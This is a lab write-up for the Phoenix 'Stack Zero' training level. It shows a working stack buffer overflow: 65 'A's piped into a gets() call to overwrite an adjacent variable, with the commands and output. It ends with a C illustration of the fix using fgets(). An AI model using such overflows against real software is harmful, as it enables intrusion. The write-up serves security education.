Exploit Education | Phoenix | Stack Zero Solution

Stack Zero

The description and source code can be found here:
https://exploit.education/phoenix/stack-zero/

All binaries for the levels can be found in the /opt/phoenix/amd64/ directory. Looking at the source code on the site, it looks like we need to change the “changeme” variable. The “locals” struct is defined at the beginning of main():

struct {
  char buffer[64];
  volatile int changeme;
} locals;

Because the struct's members are laid out contiguously on the stack, with “changeme” sitting right after the 64-byte “buffer”, the “changeme” variable can be overwritten if too many bytes are written into “buffer”. We can see that “changeme” is initialized to 0 and that gets() is used to read the user's input into “buffer”:

locals.changeme = 0;
gets(locals.buffer);

Since gets() performs no bounds checking, it should be possible to create a “buffer overflow” condition here. Let’s insert 65 A’s. First, I’ll use Python to generate the string. Then, I’ll copy-paste it into the program’s prompt for input:

user@phoenix-amd64:/opt/phoenix/amd64$ python -c 'print "A"*65'
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

user@phoenix-amd64:/opt/phoenix/amd64$ ./stack-zero
Welcome to phoenix/stack-zero, brought to you by https://exploit.education
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Well done, the 'changeme' variable has been changed!

Optionally, we could do this in one command:

user@phoenix-amd64:/opt/phoenix/amd64$ python -c 'print "A"*65' | ./stack-zero
Welcome to phoenix/stack-zero, brought to you by https://exploit.education
Well done, the 'changeme' variable has been changed!
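As an added illustration (not part of the original writeup or of the Phoenix sources), the C program below reproduces the level's struct layout and shows the two facts the writeup relies on: “changeme” starts 64 bytes past the start of “buffer”, and a 65-character line makes gets() write two bytes past the end of the array (the 65th character and the terminating NUL). It then shows the fix a developer would apply: replacing gets() with fgets() bounded by sizeof buffer, which truncates the same 65-A line at 63 characters and leaves “changeme” untouched. The reader uses a standard C temporary file as a stand-in for stdin so it runs without a pipe; the function names and the 65-A test line are constructed for this example.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Same layout as the level's locals struct. */
struct locals {
    char buffer[64];
    volatile int changeme;
};

/* Byte distance from the start of buffer to changeme. A 64-byte array
   followed by a 4-byte-aligned int needs no padding, so this is 64:
   the 65th byte written through buffer lands in changeme. */
size_t changeme_offset(void) {
    return offsetof(struct locals, changeme) - offsetof(struct locals, buffer);
}

/* How many bytes gets(locals.buffer) would store past the end of buffer
   for a given line, counting the NUL it appends. 65 'A's -> 2. */
size_t gets_overrun(const char *line) {
    size_t need = strlen(line) + 1;                   /* bytes gets() writes */
    size_t cap = sizeof ((struct locals *)0)->buffer; /* 64 */
    return need > cap ? need - cap : 0;
}

/* Hardened replacement for gets(locals.buffer): fgets() writes at most
   sizeof buffer - 1 characters plus a NUL, so it can never reach changeme.
   Returns 1 if the whole line fit, 0 if it was truncated (the rest of the
   line is drained so the next read starts on a fresh line), -1 on EOF. */
int read_line_bounded(struct locals *l, FILE *in) {
    if (fgets(l->buffer, (int)sizeof l->buffer, in) == NULL)
        return -1;
    char *nl = strchr(l->buffer, '\n');
    if (nl) { *nl = '\0'; return 1; }
    int c = fgetc(in);
    if (c == EOF) return 1;            /* last line simply had no newline */
    while (c != EOF && c != '\n') c = fgetc(in);
    return 0;
}

/* Run a constructed input line through the hardened reader, using a
   temporary file in place of stdin. *l receives the result; the return
   value is read_line_bounded's (or -1 if no temp file could be made). */
int bounded_read_of(const char *line, struct locals *l) {
    l->changeme = 0;
    FILE *in = tmpfile();
    if (!in) return -1;
    fputs(line, in);
    rewind(in);
    int rc = read_line_bounded(l, in);
    fclose(in);
    return rc;
}

/* changeme after the hardened read: stays 0 even for the 65-'A' line. */
int changeme_after_bounded_read(const char *line) {
    struct locals l;
    bounded_read_of(line, &l);
    return l.changeme;
}

/* 1 if the line fit, 0 if the hardened reader had to truncate it. */
int bounded_read_fit(const char *line) {
    struct locals l;
    return bounded_read_of(line, &l);
}

/* Number of characters the hardened reader actually stored (at most 63). */
size_t bounded_read_len(const char *line) {
    struct locals l;
    bounded_read_of(line, &l);
    return strlen(l.buffer);
}

int main(void) {
    char line[66];
    memset(line, 'A', 65);             /* the writeup's payload: 65 'A's */
    line[65] = '\0';
    printf("changeme is %zu bytes past buffer; gets() would overrun by %zu\n",
           changeme_offset(), gets_overrun(line));
    printf("hardened read: fit=%d len=%zu changeme=%d\n",
           bounded_read_fit(line), bounded_read_len(line),
           changeme_after_bounded_read(line));
    return 0;
}
```

The truncation return value matters in practice: silently cutting a line at 63 characters is safe for memory but can still surprise callers, so a real program should treat a 0 result as over-long input and reject or log it rather than carry on with a partial line.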
